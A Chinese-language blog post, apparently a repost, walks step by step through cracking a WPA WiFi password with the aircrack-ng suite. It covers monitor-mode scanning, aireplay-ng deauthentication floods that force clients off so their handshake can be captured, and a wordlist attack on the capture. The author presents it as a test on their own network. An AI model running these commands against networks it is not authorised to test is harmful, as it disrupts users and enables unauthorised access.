關於WPA加密的wifi通過握手包跑字典破解


airodump-ng wlan0mon

掃描,收集信息,記錄BSSID,CH,ESSID

然后airodump-ng -c 10(信道) --bssid xx:xx:xx:xx:xx:xx(MAC地址)-w WEP(文件名)wlan0mon

現在就是等新的客戶端連接該AP,連接的時候才能抓到握手包。成功抓包后是這個樣子(網圖,來源

 

 

 如果是自己測試,可以用aireplay-ng --deauth 20(發送的接觸認證幀數量) -a xx:xx:xx:xx:xx:xx(AP的MAC地址) wlan0mon來斷開已連接客戶端與AP的連接,迫使客戶端重新發送握手包進行連接。

但是我在kali上死活抓不到包,問了群里的老哥,說kali抓這個包看血統,既然如此那就和我等非酋無關了。所以決定去CDlinux下測試

這里指一下路:http://cdlinux.net/cdlinux-2-1-1.html

 

補充,在群里大佬的指示下得到一個新的強迫客戶端下線的命令:aireplay-ng -0 20 –a <ap mac> -c < mymac > wlan

不過在這里直接使用會出現一個問題,即wlan0mon is on channel 3, but the AP uses channel 11

這是因為頻道被切換,在網上查找資料后有說是內核版本原因,也有說是驅動程序問題。

解決方法:先用airodump-ng找到要目標AP所在的信道,然后使用-c參數來固定一個信道掃描

 

 

用這個方法成功過一次,但是沒有保存文件,,,,,很氣

 最后一通亂搞,我是用這個完成抓包的

airodump-ng wlan0mon -w WEP1 -c 8

另一個終端執行

aireplay-ng -0 20 –a <ap mac> -c < mymac > wlan

如果沒有抓到,那就多執行幾遍aireplay-ng或者把20換成別的更大的數字試試

 

抓到包后,就是比較簡單的跑字典了

aircrack-ng -w /root/john-1.8.0/run/password.lst 1.cap

因為是測試,就隨便在john里面找了一個密碼文件,然后在最后加上自己的wifi密碼。

3500跳數據,1秒都沒有就出來了。。。。。

(最后打碼的是密碼)

 

 

這速度真心可以啊

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM